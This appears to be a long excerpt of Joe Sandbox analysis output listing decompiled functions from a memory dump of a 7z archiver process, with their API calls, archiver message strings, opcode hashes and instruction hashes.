                                                                                                                                                                                                                                                                            • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                                                            • API String ID: 2553544393-24972044
                                                                                                                                                                                                                                                                            • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                                                            • Instruction ID: b30354c07b171584f65e49a028cd17dd0058dbd775acb1f37ddcf8cd88323d71
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA15B66304AC5AACB69FF72D5A03ED7322F747B80F08412ADB5E4B711DF68D8A48714
                                                                                                                                                                                                                                                                            Function 006A949B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowfputs
                                                                                                                                                                                                                                                                            • String ID: Decoding ERROR
                                                                                                                                                                                                                                                                            • API String ID: 117389134-2585761706
                                                                                                                                                                                                                                                                            • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                                                            • Instruction ID: 29881044ad259d21af82495edbde622058e02ab19cd37d60e46578b4b2c3a69f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1631ADB23199C181DA70FB65E8903AAA363F783790F485526CA8E57758DF38CC96CF05
                                                                                                                                                                                                                                                                            Function 0068A7FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00666464: FreeLibrary.KERNELBASE(?,?,?,006664E7), ref: 00666475
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0068A8CA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0068A8E8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0068A908
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068A985
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068A996
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                                                                                            • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                                                                                            • API String ID: 852969883-606380122
                                                                                                                                                                                                                                                                            • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                                                            • Instruction ID: 7ef5f70d6c5e6f79224c43aa5ab94eb14bd444a197df9be14f694dc0633dbebc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB41B272210B4086EF21EF66E85079E7362FB85B94F088625DF8E47765EF38C586C311
                                                                                                                                                                                                                                                                            Function 006AB480 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 006AB723
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AB743
                                                                                                                                                                                                                                                                              • Part of subcall function 006638C8: memmove.MSVCRT(0066A0E5), ref: 00663907
                                                                                                                                                                                                                                                                              • Part of subcall function 00663A64: memmove.MSVCRT ref: 00663AAA
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 006AB49E
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 006AB4E3
                                                                                                                                                                                                                                                                            • wcscmp.MSVCRT ref: 006AB502
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 006AB568
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                                                            • API String ID: 591578422-4150638102
                                                                                                                                                                                                                                                                            • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                                                            • Instruction ID: 12cfaa0f85b93bb37bda52718673e99c91dc0d1b1b87603f9c0bf1f75dab7ab0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DA17B73700A85A7CB59EF2AD69029D7362F755780F80902ADB5A47B12DF74ECB6CB00
                                                                                                                                                                                                                                                                            Function 006A2ECC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2F7E
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2F9D
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A2FB6
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A2FC1
                                                                                                                                                                                                                                                                              • Part of subcall function 00662C78: free.MSVCRT ref: 00662CAE
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A2FCC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputs
                                                                                                                                                                                                                                                                            • String ID: = $h<k
                                                                                                                                                                                                                                                                            • API String ID: 2444650769-3958619723
                                                                                                                                                                                                                                                                            • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                                                            • Instruction ID: ce451d7f2176f660d90825ad2531a04a52e46f3336567e50583c6b86e6168f1d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C321B66334894185CB60FF19E4A026EA732E7D67D0F445226FF5E43768DF28C945CB04
                                                                                                                                                                                                                                                                            Function 00689D98 Relevance: 12.1, APIs: 8, Instructions: 134COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00689BCC: free.MSVCRT ref: 00689C11
                                                                                                                                                                                                                                                                              • Part of subcall function 00689BCC: free.MSVCRT ref: 00689C19
                                                                                                                                                                                                                                                                              • Part of subcall function 00689BCC: free.MSVCRT ref: 00689C3B
                                                                                                                                                                                                                                                                              • Part of subcall function 00689BCC: free.MSVCRT ref: 00689D2A
                                                                                                                                                                                                                                                                            • wcscmp.MSVCRT ref: 00689E66
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689ECA
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689ED4
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689F13
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689F1B
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689F28
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689F49
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00689F51
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3584677832-0
                                                                                                                                                                                                                                                                            • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                                                            • Instruction ID: cb6ca16dd8719f86afaec5fe5b4eb978fbe762fd53cabff60bddc232c1bb3130
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D41E572304A8191CB50FF12E8541AFA762F786BE8F485219EF1D57764DF78C846C704
                                                                                                                                                                                                                                                                            Function 006AE16E Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 352749199-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                                                            • Instruction ID: 0a4c5257bb28ce2e85289d92079e4b168cc2003147baff6ce62a22a316975ef9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84318E71214741CAEB40EFA4E89075A77A3F386764F00022AE6AA537A4CF3EC855CF42
                                                                                                                                                                                                                                                                            Function 006AE15A Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 352749199-0
                                                                                                                                                                                                                                                                            • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction ID: c265582d521fc54bfb23bf7b0aa2a54566f066c7886acea0039d9f8abeb3276e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22214D71214B4186EB40EF68E89075A77A3F78A764F000226E6AE537B4DF3EC855CF42
                                                                                                                                                                                                                                                                            Function 006AE139 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 352749199-0
                                                                                                                                                                                                                                                                            • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction ID: c265582d521fc54bfb23bf7b0aa2a54566f066c7886acea0039d9f8abeb3276e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22214D71214B4186EB40EF68E89075A77A3F78A764F000226E6AE537B4DF3EC855CF42
                                                                                                                                                                                                                                                                            Function 006AE1A6 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 352749199-0
                                                                                                                                                                                                                                                                            • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction ID: c265582d521fc54bfb23bf7b0aa2a54566f066c7886acea0039d9f8abeb3276e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22214D71214B4186EB40EF68E89075A77A3F78A764F000226E6AE537B4DF3EC855CF42
                                                                                                                                                                                                                                                                            Function 00684610 Relevance: 8.8, APIs: 7, Instructions: 62COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                                                            • Instruction ID: d39215cb0180b9281b374477b48e52cde578aea01d10b530e8de812e7eaddd4a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B118F63744E4686CA60BE22D9611696322EB93BA07084325DF6D277D5EF20C8A28308
                                                                                                                                                                                                                                                                            Function 0068419C Relevance: 8.8, APIs: 7, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                                                            • Instruction ID: 14e631643859288c3d9fcd8bb7ace2c630a9bfbd2018ce0f4d3b99d4f148185f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF11F372316E4185CF04EF76C8B122CB321FBC2F98B044666AF2E5B7A5CF24C8068348
                                                                                                                                                                                                                                                                            Function 00693A42 Relevance: 7.7, APIs: 6, Instructions: 151COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                                                            • Instruction ID: 83b4e15016a06e33cf3e55bd3f836c8845875faedee9c1637030dc0f3bca3d18
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F515C72200A4181CF50EF25C4A02EE6722F795FC8F905126EB4EA7728DF38CA8AC745
                                                                                                                                                                                                                                                                            Function 006A1544 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A15D5
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$memset
                                                                                                                                                                                                                                                                            • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                                                                                            • API String ID: 3543874852-295398807
                                                                                                                                                                                                                                                                            • Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                                                            • Instruction ID: a88b869f06e52085bc6ddaeacaaecf283e0f37fc39f1482f653ba2888470b03f
